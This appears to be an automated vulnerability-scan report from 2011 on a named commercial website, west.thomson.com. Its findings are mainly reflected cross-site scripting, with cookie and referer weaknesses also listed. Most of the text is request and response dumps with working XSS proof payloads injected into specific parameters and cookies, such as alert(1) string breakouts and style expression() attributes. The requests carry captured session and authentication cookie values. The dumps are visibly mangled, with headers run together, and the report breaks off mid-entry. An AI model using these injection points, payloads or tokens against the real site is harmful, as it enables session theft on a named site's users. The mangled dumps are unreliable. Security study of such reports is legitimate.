CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') Report generated by XSS.CX at Tue Apr 26 15:49:04 CDT 2011. Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search
Loading
1. Cross-site scripting (reflected)
1.1. http://west.thomson.com/support/contact-us/default.aspx [FindingMethod parameter]
1.2. http://west.thomson.com/support/contact-us/default.aspx [FindingMethod parameter]
1.3. http://west.thomson.com/support/contact-us/default.aspx [PromCode parameter]
1.4. http://west.thomson.com/support/contact-us/default.aspx [PromCode parameter]
1.5. http://west.thomson.com/support/contact-us/default.aspx [name of an arbitrarily supplied request parameter]
1.6. https://west.thomson.com/store/Promotions/EmailPreferences/Login.aspx [FindingMethod parameter]
1.7. https://west.thomson.com/store/Promotions/EmailPreferences/Login.aspx [PromCode parameter]
1.8. http://west.thomson.com/productdetail/160547/12484463/productdetail.aspx [ASP.NET_SessionId cookie]
1.9. http://west.thomson.com/store/DOTD.aspx [ASP.NET_SessionId cookie]
1.10. http://west.thomson.com/store/product.aspx [ASP.NET_SessionId cookie]
1.11. http://west.thomson.com/store/secure/ShoppingBasket.aspx [ASP.NET_SessionId cookie]
1.12. http://west.thomson.com/store/secure/ShoppingBasket.aspx [anonymous_userid_1 cookie]
1.13. http://west.thomson.com/support/contact-us/default.aspx [ASP.NET_SessionId cookie]
1.14. https://west.thomson.com/store/Promotions/EmailPreferences/Login.aspx [ASP.NET_SessionId cookie]
1.15. https://west.thomson.com/store/secure/EmptyBasket.aspx [ASP.NET_SessionId cookie]
2. Open redirection
3. SSL cookie without secure flag set
3.1. https://west.thomson.com/GlobalBackgroundStyles.5.1.421.22.ashx
3.2. https://west.thomson.com/store/Promotions/EmailPreferences/Login.aspx
3.3. https://west.thomson.com/store/secure/EmptyBasket.aspx
3.4. https://west.thomson.com/store/secure/ShippingInfo.aspx
3.5. https://west.thomson.com/store/secure/ShippingLocation.aspx
3.6. https://west.thomson.com/support/customer-service/order-info.aspx
4. Cross-domain Referer leakage
4.1. http://west.thomson.com/Error/500Error.aspx
4.2. http://west.thomson.com/productdetail/160547/12484463/productdetail.aspx
4.3. http://west.thomson.com/store/secure/ShoppingBasket.aspx
4.4. http://west.thomson.com/store/secure/ShoppingBasket.aspx
4.5. http://west.thomson.com/support/contact-us/default.aspx
4.6. https://west.thomson.com/store/Promotions/EmailPreferences/Login.aspx
4.7. https://west.thomson.com/store/secure/ShippingInfo.aspx
5. Cross-domain script include
5.1. http://west.thomson.com/Error/500Error.aspx
5.2. http://west.thomson.com/default.aspx
5.3. http://west.thomson.com/productdetail/160547/12484463/productdetail.aspx
5.4. http://west.thomson.com/store/secure/ShoppingBasket.aspx
5.5. http://west.thomson.com/support/contact-us/default.aspx
5.6. https://west.thomson.com/store/Promotions/EmailPreferences/Login.aspx
5.7. https://west.thomson.com/store/secure/EmptyBasket.aspx
5.8. https://west.thomson.com/store/secure/ShippingInfo.aspx
5.9. https://west.thomson.com/support/customer-service/order-info.aspx
6. Cookie without HttpOnly flag set
6.1. http://west.thomson.com/Error/500Error.aspx
6.2. http://west.thomson.com/GlobalBackgroundStyles.5.1.421.22.ashx
6.3. http://west.thomson.com/Register/CreateTransferToken.aspx
6.4. http://west.thomson.com/Signin.aspx
6.5. http://west.thomson.com/default.aspx
6.6. http://west.thomson.com/productdetail/160547/12484463/productdetail.aspx
6.7. http://west.thomson.com/store/AddItem.aspx
6.8. http://west.thomson.com/store/DOTD.aspx
6.9. http://west.thomson.com/store/secure/ShoppingBasket.aspx
6.10. http://west.thomson.com/support/contact-us/default.aspx
6.11. https://west.thomson.com/GlobalBackgroundStyles.5.1.421.22.ashx
6.12. https://west.thomson.com/store/Promotions/EmailPreferences/Login.aspx
6.13. https://west.thomson.com/store/secure/EmptyBasket.aspx
6.14. https://west.thomson.com/store/secure/ShippingInfo.aspx
6.15. https://west.thomson.com/store/secure/ShippingLocation.aspx
6.16. https://west.thomson.com/support/customer-service/order-info.aspx
7. Email addresses disclosed
8. Cacheable HTTPS response
8.1. https://west.thomson.com/noexpire/font/knowledgebold-webfont-2010.woff
8.2. https://west.thomson.com/noexpire/font/knowledgelight-webfont-2010.woff
8.3. https://west.thomson.com/store/Promotions/EmailPreferences/Login.aspx
8.4. https://west.thomson.com/store/secure/EmptyBasket.aspx
8.5. https://west.thomson.com/store/secure/ShippingInfo.aspx
8.6. https://west.thomson.com/support/customer-service/order-info.aspx
1. Cross-site scripting (reflected)
next
There are 15 instances of this issue:
Issue background
Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.
Remediation background
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised. User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).
1.1. http://west.thomson.com/support/contact-us/default.aspx [FindingMethod parameter]
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://west.thomson.com
Path:
/support/contact-us/default.aspx
Issue detail
The value of the FindingMethod request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c3b99"%3balert(1)//ee36c302041 was submitted in the FindingMethod parameter. This input was echoed as c3b99";alert(1)//ee36c302041 in the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /support/contact-us/default.aspx?PromCode=571422&FindingMethod=Navigationc3b99"%3balert(1)//ee36c302041 HTTP/1.1,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5;q=0.3=bijb1vookoje2tnvwh5oouwn; s_id=bijb1vookoje2tnvwh5oouwn; anonymous_userid_1={71c28bcc-895f-4239-9850-58ed6aba178d}; s_cc=true; c_m2=1; c=undefinedDirect%20LoadDirect%20Load; SC_LINKS=%5B%5BB%5D%5D; s_ev48=%5B%5B%27Direct%2520Load%27%2C%271303848189235%27%5D%5D; gpv_pn=default; s_sq=%5B%5BB%5D%5D; _msuuid_787f8z6077=2F84C080-8A3F-4B04-9E5C-65EFFF4158D3; s_ppv=75; .WTCAUTH=06CA2923AD720AED00911CF592288E796D54EF811208119980F8FB37CA43273D9DFEC8C40F3C0D72C7F3F5BB3FA9C8F3C5E74EE348ECCA6B35E4E107909B01AE597FE9603A89811073C77C2D1CEF0DFCF4C3954A224BA70CB09C1F7BB4132B10277D7057D02CD5A348E567450BC9313BF64CF52EE76F06E0A742647B41E23ED82ABCD1F3EF162F1597FC356A16F46C4C3ECC94AE454D8BD3AE08271BA0F4BF28ED7AAD920CC0D4EB5DA1F49BB1CE5F414460A82807C25F612865975ED0388641DF48A052AE97A698D5F7B6FCE96AA4A5F527AD930E272A65F131FEF9F615E6BC8D4D124F; Guest_Status=True; Guest_User=-1; LastKnownSiteId=1; UserSiteIdIdentifier=
Response
HTTP/1.1 200 OK95D4E2E7CE1C2E779C0AC51DE6EC75612A9D896AB254F4AC968936082E431775F60E4A9FEC758C7B379B7E9C148FDE7C42E377EC2B94717F34826D37B70C37592A9E326757129576936CF4E5696C22244AF81FCE5CB09ED7602BBCDFB8B9D8BE44DB6B3D1E0E5B294F2E4CBB2303395345B4876632E75245D7E1BDFA1B746DB7B797429DB04AE73B27D0457BD88A682D2CB17C9277B4DF1B0ABC802BC49FDD798F957B2237E83946179DD21D86221CDF3C178A0A3500EB93FF8A840031DDC3926FD0BE588DFBEEF73F6CCA6A46FA61962F170913EC3AB2309DCA46E4E495B; expires=Tue, 26-Apr-2011 20:50:06 GMT; path=/; HttpOnlyEF4EE0AC1814985A55E353BAD075BE0EDAB462A85EDE33A9D2ED13D7DBC682CF383E6B8A0F5C95CB3C9CED8DCC5BD767D602A10A7001F04B3C262AD734462DF868F31DCC91DE5353DF87B9618E146A3B7214DA03827251D450B59409F3511481CED0983309492156BED4F1FEF312458F0F6C95EE148C6A1D8F7CE4BE754A2154C8755497A8BB71FE009BC07B22C6AB3F4127F28DA58249113F28376A44DC053E6AAC2FBA81B3BE8E3BC0B38FEE96AD1A6B8F747B3E076747B6481F336006ADA46B431539CE6673FB1569DF55B1092CA333F9AF67C8558BFB787EB33F51883; path=//xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml" >...[SNIP]... c3b99";alert(1)//ee36c302041 "...[SNIP]...
1.2. http://west.thomson.com/support/contact-us/default.aspx [FindingMethod parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://west.thomson.com
Path:
/support/contact-us/default.aspx
Issue detail
The value of the FindingMethod request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 970be"style%3d"x%3aexpression(alert(1))"b6e0c02100b was submitted in the FindingMethod parameter. This input was echoed as 970be"style="x:expression(alert(1))"b6e0c02100b in the application's response.
Request
GET /support/contact-us/default.aspx?PromCode=571422&FindingMethod=Navigation970be"style%3d"x%3aexpression(alert(1))"b6e0c02100b HTTP/1.1,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5;q=0.3=bijb1vookoje2tnvwh5oouwn; s_id=bijb1vookoje2tnvwh5oouwn; anonymous_userid_1={71c28bcc-895f-4239-9850-58ed6aba178d}; s_cc=true; c_m2=1; c=undefinedDirect%20LoadDirect%20Load; SC_LINKS=%5B%5BB%5D%5D; s_ev48=%5B%5B%27Direct%2520Load%27%2C%271303848189235%27%5D%5D; gpv_pn=default; s_sq=%5B%5BB%5D%5D; _msuuid_787f8z6077=2F84C080-8A3F-4B04-9E5C-65EFFF4158D3; s_ppv=75; .WTCAUTH=06CA2923AD720AED00911CF592288E796D54EF811208119980F8FB37CA43273D9DFEC8C40F3C0D72C7F3F5BB3FA9C8F3C5E74EE348ECCA6B35E4E107909B01AE597FE9603A89811073C77C2D1CEF0DFCF4C3954A224BA70CB09C1F7BB4132B10277D7057D02CD5A348E567450BC9313BF64CF52EE76F06E0A742647B41E23ED82ABCD1F3EF162F1597FC356A16F46C4C3ECC94AE454D8BD3AE08271BA0F4BF28ED7AAD920CC0D4EB5DA1F49BB1CE5F414460A82807C25F612865975ED0388641DF48A052AE97A698D5F7B6FCE96AA4A5F527AD930E272A65F131FEF9F615E6BC8D4D124F; Guest_Status=True; Guest_User=-1; LastKnownSiteId=1; UserSiteIdIdentifier=
Response
HTTP/1.1 200 OKF82CE9AE83EB452A041411CF7CB35034F5F59275166074B2D6F9942F4C02C9C6A4752B4EE8BF68E389C72C1EEC5FE403114AD3E025999AD1D3A7D8509CDCBDB9610BFE52B48A5DBA0737F36A325443BB35BCD968D0DCA188F04C3D64497A9C8415EB8225C80F43851731C945453DEB02A102C2975B09929F6C6805BF4A3F18E5E8F4C73AC20E4A75C41A2A78E3438D61F0AFF8143E7411A5A73910C7405229C7448FA582A6DCD1DEE6C9B1DFA606925BBC7B865D777B1C0E2286B6E2D7C4AEE0299D6916D920B569263B589ADEFE279BBD963E96FA9C694FFA7566F5BE5DA; expires=Tue, 26-Apr-2011 20:48:45 GMT; path=/; HttpOnly27E0D162AF2DADB7CD21AEEAA5F973E30999D1E5A4D12D1E7A8BEE05072991099E4B273E84DC94EF7E2D0ECC8C35F3617EDAA6A78BA5DC99CC24F42A9600AD357B60FE259BA5BB686DC1398365CC6D645DECDC1274E7B64CC02E49984AB3435433883913BE5EA2DE24ECA406761F721A8C0B65091A5961EBD3F5B157F183961120E5B3F35143659B8294DAF1E04123667BA68CE04C9E0F270C0202EB4A9AF77961D42103E9A9FE448DBF40E4181CE35E14A6F1609E7BFCA13B5508749B6651E34DF0147D9DAFF146A52C5A3595FFC96142DA196B03953FEE825AFE4DE1131; path=//xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml" >...[SNIP]... tactUsLink" href="javascript:void(0);":PrintThisPage('http://west.thomson.com/support/contact-us/default.aspx?PromCode=571422&FindingMethod=Navigation970be"style="x:expression(alert(1))"b6e0c02100b '); return false;" >...[SNIP]...
1.3. http://west.thomson.com/support/contact-us/default.aspx [PromCode parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://west.thomson.com
Path:
/support/contact-us/default.aspx
Issue detail
The value of the PromCode request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a8a66"style%3d"x%3aexpression(alert(1))"2617e1b896b was submitted in the PromCode parameter. This input was echoed as a8a66"style="x:expression(alert(1))"2617e1b896b in the application's response.
Request
GET /support/contact-us/default.aspx?PromCode=571422a8a66"style%3d"x%3aexpression(alert(1))"2617e1b896b &FindingMethod=Navigation HTTP/1.1,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5;q=0.3=bijb1vookoje2tnvwh5oouwn; s_id=bijb1vookoje2tnvwh5oouwn; anonymous_userid_1={71c28bcc-895f-4239-9850-58ed6aba178d}; s_cc=true; c_m2=1; c=undefinedDirect%20LoadDirect%20Load; SC_LINKS=%5B%5BB%5D%5D; s_ev48=%5B%5B%27Direct%2520Load%27%2C%271303848189235%27%5D%5D; gpv_pn=default; s_sq=%5B%5BB%5D%5D; _msuuid_787f8z6077=2F84C080-8A3F-4B04-9E5C-65EFFF4158D3; s_ppv=75; .WTCAUTH=06CA2923AD720AED00911CF592288E796D54EF811208119980F8FB37CA43273D9DFEC8C40F3C0D72C7F3F5BB3FA9C8F3C5E74EE348ECCA6B35E4E107909B01AE597FE9603A89811073C77C2D1CEF0DFCF4C3954A224BA70CB09C1F7BB4132B10277D7057D02CD5A348E567450BC9313BF64CF52EE76F06E0A742647B41E23ED82ABCD1F3EF162F1597FC356A16F46C4C3ECC94AE454D8BD3AE08271BA0F4BF28ED7AAD920CC0D4EB5DA1F49BB1CE5F414460A82807C25F612865975ED0388641DF48A052AE97A698D5F7B6FCE96AA4A5F527AD930E272A65F131FEF9F615E6BC8D4D124F; Guest_Status=True; Guest_User=-1; LastKnownSiteId=1; UserSiteIdIdentifier=
Response
HTTP/1.1 200 OK132554090A7233C8C4843EF17B236BAD3E6EBEA65A8BB0CD2D741506E1421320162A52C3A2A32D9E1279D4B28EC80DE7E9C56A85F6653EAF311A8A70E77BB35F8AFC5922187B9DA5EBFA8BC893AC9D5AF5F3782803FF4909E128E73211A5FC2474F05FA11998DA539BDEF4CE8924724B322089DD11F6FF8957EC4FD085D0E19D914BFC251ACF4C072441E19782B93C32BE38086DCBE32BFF68F2FBC79B02A28E183792BA967437A71EAE07588FE59F65575F0BCDF54EB51520909B86D445EFC3AB2E03332C1CBBB00D37D72DCDFCD215FEF9746931347CC83D4654FE0DECC; path=//xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml" >...[SNIP]... tactUsLink" href="javascript:void(0);":PrintThisPage('http://west.thomson.com/support/contact-us/default.aspx?PromCode=571422a8a66"style="x:expression(alert(1))"2617e1b896b &FindingMethod=Navigation'); return false;" >...[SNIP]...
1.4. http://west.thomson.com/support/contact-us/default.aspx [PromCode parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://west.thomson.com
Path:
/support/contact-us/default.aspx
Issue detail
The value of the PromCode request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cbbd9"%3balert(1)//e1045719b6a was submitted in the PromCode parameter. This input was echoed as cbbd9";alert(1)//e1045719b6a in the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /support/contact-us/default.aspx?PromCode=571422cbbd9"%3balert(1)//e1045719b6a &FindingMethod=Navigation HTTP/1.1,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5;q=0.3=bijb1vookoje2tnvwh5oouwn; s_id=bijb1vookoje2tnvwh5oouwn; anonymous_userid_1={71c28bcc-895f-4239-9850-58ed6aba178d}; s_cc=true; c_m2=1; c=undefinedDirect%20LoadDirect%20Load; SC_LINKS=%5B%5BB%5D%5D; s_ev48=%5B%5B%27Direct%2520Load%27%2C%271303848189235%27%5D%5D; gpv_pn=default; s_sq=%5B%5BB%5D%5D; _msuuid_787f8z6077=2F84C080-8A3F-4B04-9E5C-65EFFF4158D3; s_ppv=75; .WTCAUTH=06CA2923AD720AED00911CF592288E796D54EF811208119980F8FB37CA43273D9DFEC8C40F3C0D72C7F3F5BB3FA9C8F3C5E74EE348ECCA6B35E4E107909B01AE597FE9603A89811073C77C2D1CEF0DFCF4C3954A224BA70CB09C1F7BB4132B10277D7057D02CD5A348E567450BC9313BF64CF52EE76F06E0A742647B41E23ED82ABCD1F3EF162F1597FC356A16F46C4C3ECC94AE454D8BD3AE08271BA0F4BF28ED7AAD920CC0D4EB5DA1F49BB1CE5F414460A82807C25F612865975ED0388641DF48A052AE97A698D5F7B6FCE96AA4A5F527AD930E272A65F131FEF9F615E6BC8D4D124F; Guest_Status=True; Guest_User=-1; LastKnownSiteId=1; UserSiteIdIdentifier=
Response
HTTP/1.1 200 OKE83983E00226255A78F21FAA1BC74A78401487F2215DBA44FD3F456976C25CBE9328D216388040278635360938504ADEEBEBEBBDBD2CC39F9B0511B2A66AE979489ED5CBBA08562C2A311FB06A1D0942DD9717FA9E2E0ECBE2F3A8399171FCF52F4401BE9A284D00268CFB8526C03E8BB950EA2191372E82E286F69067BA84001E3EBEE376077985B6B371B92A1320FA3BE317E63DBE1DE2B8B6F72F71F1FA88AB7C3429F9D0E1363E7525D795CF2F879016CB2990E3DD9B88615C1435A3C3E306212B817339FD3679B39180F26487343BD72D47EC86023C2D688CC3A9A8B; path=//xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml" >...[SNIP]... :contact-us:default"cbbd9";alert(1)//e1045719b6a "...[SNIP]...
1.5. http://west.thomson.com/support/contact-us/default.aspx [name of an arbitrarily supplied request parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://west.thomson.com
Path:
/support/contact-us/default.aspx
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8fdea"style%3d"x%3aexpression(alert(1))"22c4a465138 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 8fdea"style="x:expression(alert(1))"22c4a465138 in the application's response.
Request
GET /support/contact-us/default.aspx?PromCode=571422&FindingMethod=Navigation&8fdea"style%3d"x%3aexpression(alert(1))"22c4a465138 =1 HTTP/1.1,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5;q=0.3=bijb1vookoje2tnvwh5oouwn; s_id=bijb1vookoje2tnvwh5oouwn; anonymous_userid_1={71c28bcc-895f-4239-9850-58ed6aba178d}; s_cc=true; c_m2=1; c=undefinedDirect%20LoadDirect%20Load; SC_LINKS=%5B%5BB%5D%5D; s_ev48=%5B%5B%27Direct%2520Load%27%2C%271303848189235%27%5D%5D; gpv_pn=default; s_sq=%5B%5BB%5D%5D; _msuuid_787f8z6077=2F84C080-8A3F-4B04-9E5C-65EFFF4158D3; s_ppv=75; .WTCAUTH=06CA2923AD720AED00911CF592288E796D54EF811208119980F8FB37CA43273D9DFEC8C40F3C0D72C7F3F5BB3FA9C8F3C5E74EE348ECCA6B35E4E107909B01AE597FE9603A89811073C77C2D1CEF0DFCF4C3954A224BA70CB09C1F7BB4132B10277D7057D02CD5A348E567450BC9313BF64CF52EE76F06E0A742647B41E23ED82ABCD1F3EF162F1597FC356A16F46C4C3ECC94AE454D8BD3AE08271BA0F4BF28ED7AAD920CC0D4EB5DA1F49BB1CE5F414460A82807C25F612865975ED0388641DF48A052AE97A698D5F7B6FCE96AA4A5F527AD930E272A65F131FEF9F615E6BC8D4D124F; Guest_Status=True; Guest_User=-1; LastKnownSiteId=1; UserSiteIdIdentifier=
Response
HTTP/1.1 200 OK/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml" >...[SNIP]... tactUsLink" href="javascript:void(0);":PrintThisPage('http://west.thomson.com/support/contact-us/default.aspx?PromCode=571422&FindingMethod=Navigation&8fdea"style="x:expression(alert(1))"22c4a465138 =1'); return false;" >...[SNIP]...
1.6. https://west.thomson.com/store/Promotions/EmailPreferences/Login.aspx [FindingMethod parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
https://west.thomson.com
Path:
/store/Promotions/EmailPreferences/Login.aspx
Issue detail
The value of the FindingMethod request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 54b8b"%3balert(1)//787512fed9c was submitted in the FindingMethod parameter. This input was echoed as 54b8b";alert(1)//787512fed9c in the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /store/Promotions/EmailPreferences/Login.aspx?Mstr=wtc&PromCode=571419&FindingMethod=Navigation54b8b"%3balert(1)//787512fed9c HTTP/1.1,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5;q=0.3=bijb1vookoje2tnvwh5oouwn; s_id=bijb1vookoje2tnvwh5oouwn; anonymous_userid_1={71c28bcc-895f-4239-9850-58ed6aba178d}; s_cc=true; c_m2=1; c=undefinedDirect%20LoadDirect%20Load; SC_LINKS=%5B%5BB%5D%5D; s_ev48=%5B%5B%27Direct%2520Load%27%2C%271303848189235%27%5D%5D; gpv_pn=default; s_sq=%5B%5BB%5D%5D; _msuuid_787f8z6077=2F84C080-8A3F-4B04-9E5C-65EFFF4158D3; s_ppv=75; .WTCAUTH=06CA2923AD720AED00911CF592288E796D54EF811208119980F8FB37CA43273D9DFEC8C40F3C0D72C7F3F5BB3FA9C8F3C5E74EE348ECCA6B35E4E107909B01AE597FE9603A89811073C77C2D1CEF0DFCF4C3954A224BA70CB09C1F7BB4132B10277D7057D02CD5A348E567450BC9313BF64CF52EE76F06E0A742647B41E23ED82ABCD1F3EF162F1597FC356A16F46C4C3ECC94AE454D8BD3AE08271BA0F4BF28ED7AAD920CC0D4EB5DA1F49BB1CE5F414460A82807C25F612865975ED0388641DF48A052AE97A698D5F7B6FCE96AA4A5F527AD930E272A65F131FEF9F615E6BC8D4D124F; Guest_Status=True; Guest_User=-1; LastKnownSiteId=1; UserSiteIdIdentifier=
Response
HTTP/1.1 200 OK5EA9D27EB48E3569CAAC75DD12D0163E2A96333E37FCB92A89FEF22C4CDA18B63632293AFEC4F9CFD9C9C97E5682A7E60915FAFE192F03575061A2C1F7D23CCA0E7ED605E5F5492180F4426EFF8A8783D7A5E3381ECAE88D68155FBEACC8E2DB7BD8240E1093D7DDB51C0888024E7EB20CDB935C5FCC0F5D92DB1CC5DCB37E7C43A7D6F70F845E5734B30C7F12D40B5DFFBB8E01E6F438077AE71F0FE7F41C48E13EDD3F02AACF65617502C96EB6EC12E55699539259D0C264204C410CDAD3E75333C6721A7A6E6E94D6AA711D0C756D8E790683D527B3A2C30135392CEA3; expires=Tue, 26-Apr-2011 20:49:18 GMT; path=/; HttpOnlyE636C3842D4E8FB2372CAB30A2B20D50B5F64F0864744264CC3321EE01EB9F8ECEFEFF72029FB375BC1EE012B3C3CB5BD9084715C8557C0195E468F8D058B79FF0FA94B651F6BA4D955161968DD96B238CF4BA68FA87855F6280BBC307E13A3A869A3F22834DF744FD3EF61E895A6BDD889522E126D0F79E1B51ECFC721C2612227EE07A17FAB126B1ED6F3DB4C601A1A5885C9CD6F6FA589BF4774CF9D406ED0F26CAD669AC1C6CF18A98465B4573A6F6B0B3B38E7B68FBE5819CDD10DB57EBF972D5551EEC0D374718621BC73ED4771BA20AF903833569BC0950443C88C; path=//xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml">...[SNIP]... 54b8b";alert(1)//787512fed9c "...[SNIP]...
1.7. https://west.thomson.com/store/Promotions/EmailPreferences/Login.aspx [PromCode parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
https://west.thomson.com
Path:
/store/Promotions/EmailPreferences/Login.aspx
Issue detail
The value of the PromCode request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 749d9"%3balert(1)//72d68614b4 was submitted in the PromCode parameter. This input was echoed as 749d9";alert(1)//72d68614b4 in the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /store/Promotions/EmailPreferences/Login.aspx?Mstr=wtc&PromCode=571419749d9"%3balert(1)//72d68614b4 &FindingMethod=Navigation HTTP/1.1,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5;q=0.3=bijb1vookoje2tnvwh5oouwn; s_id=bijb1vookoje2tnvwh5oouwn; anonymous_userid_1={71c28bcc-895f-4239-9850-58ed6aba178d}; s_cc=true; c_m2=1; c=undefinedDirect%20LoadDirect%20Load; SC_LINKS=%5B%5BB%5D%5D; s_ev48=%5B%5B%27Direct%2520Load%27%2C%271303848189235%27%5D%5D; gpv_pn=default; s_sq=%5B%5BB%5D%5D; _msuuid_787f8z6077=2F84C080-8A3F-4B04-9E5C-65EFFF4158D3; s_ppv=75; .WTCAUTH=06CA2923AD720AED00911CF592288E796D54EF811208119980F8FB37CA43273D9DFEC8C40F3C0D72C7F3F5BB3FA9C8F3C5E74EE348ECCA6B35E4E107909B01AE597FE9603A89811073C77C2D1CEF0DFCF4C3954A224BA70CB09C1F7BB4132B10277D7057D02CD5A348E567450BC9313BF64CF52EE76F06E0A742647B41E23ED82ABCD1F3EF162F1597FC356A16F46C4C3ECC94AE454D8BD3AE08271BA0F4BF28ED7AAD920CC0D4EB5DA1F49BB1CE5F414460A82807C25F612865975ED0388641DF48A052AE97A698D5F7B6FCE96AA4A5F527AD930E272A65F131FEF9F615E6BC8D4D124F; Guest_Status=True; Guest_User=-1; LastKnownSiteId=1; UserSiteIdIdentifier=
Response
HTTP/1.1 200 OK5BF1CDDBBBACB727FD4F43428482F7C563F0EA97F18B91DD9FD3F138B25C98AA96EBA38EDBC1589BA5D26B61808A57D0181247B61D3532602037BA027D5FCE7F6BE62C519A918C3C48B8A8A8D9BDF2BBF4D4EB2E67EAB361D4FD27CC98B24F6589E3D21287619AAA5AC80D7930280A1D86B07F463F3D62E9EECB79DED2B0B5C061287C1FD67F659A7EC02250606ED60FF5F38EB6D84D0F8F3B50821A280C3EF0E9122D3E78CAA9F50376CFBE7131D01B384AD1A9DB7762AC4912A915968CF8A1C156573D216989DE281CE5CE92FA4E43EF9F86851E9360F38B8EF61D571C0; path=//xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml">...[SNIP]... :promotions:emailpreferences:login"749d9";alert(1)//72d68614b4 "...[SNIP]...
1.8. http://west.thomson.com/productdetail/160547/12484463/productdetail.aspx [ASP.NET_SessionId cookie]
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://west.thomson.com
Path:
/productdetail/160547/12484463/productdetail.aspx
Issue detail
The value of the ASP.NET_SessionId cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e3753"-alert(1)-"1bbca0be6e9 was submitted in the ASP.NET_SessionId cookie. This input was echoed unmodified in the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /productdetail/160547/12484463/productdetail.aspx?PromCode=645229L86530&PromType=internal HTTP/1.1,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5;q=0.3=bijb1vookoje2tnvwh5oouwne3753"-alert(1)-"1bbca0be6e9 ; s_id=bijb1vookoje2tnvwh5oouwn; anonymous_userid_1={71c28bcc-895f-4239-9850-58ed6aba178d}; s_cc=true; c_m2=1; c=undefinedDirect%20LoadDirect%20Load; SC_LINKS=%5B%5BB%5D%5D; s_ev48=%5B%5B%27Direct%2520Load%27%2C%271303848189235%27%5D%5D; gpv_pn=default; s_sq=%5B%5BB%5D%5D; _msuuid_787f8z6077=2F84C080-8A3F-4B04-9E5C-65EFFF4158D3; s_ppv=75; .WTCAUTH=06CA2923AD720AED00911CF592288E796D54EF811208119980F8FB37CA43273D9DFEC8C40F3C0D72C7F3F5BB3FA9C8F3C5E74EE348ECCA6B35E4E107909B01AE597FE9603A89811073C77C2D1CEF0DFCF4C3954A224BA70CB09C1F7BB4132B10277D7057D02CD5A348E567450BC9313BF64CF52EE76F06E0A742647B41E23ED82ABCD1F3EF162F1597FC356A16F46C4C3ECC94AE454D8BD3AE08271BA0F4BF28ED7AAD920CC0D4EB5DA1F49BB1CE5F414460A82807C25F612865975ED0388641DF48A052AE97A698D5F7B6FCE96AA4A5F527AD930E272A65F131FEF9F615E6BC8D4D124F; Guest_Status=True; Guest_User=-1; LastKnownSiteId=1; UserSiteIdIdentifier=
Response (redirected)
HTTP/1.1 200 OK=b4ir1ropqmrczsbyznt5ccva; path=/; HttpOnly/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml">...[SNIP]... "756bd9ec9a083c52");"http://recs.richrelevance.com/rrserver/");"bijb1vookoje2tnvwh5oouwne3753"-alert(1)-"1bbca0be6e9 ");{71c28bcc-895f-4239-9850-58ed6aba178d}");...[SNIP]...
1.9. http://west.thomson.com/store/DOTD.aspx [ASP.NET_SessionId cookie]
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://west.thomson.com
Path:
/store/DOTD.aspx
Issue detail
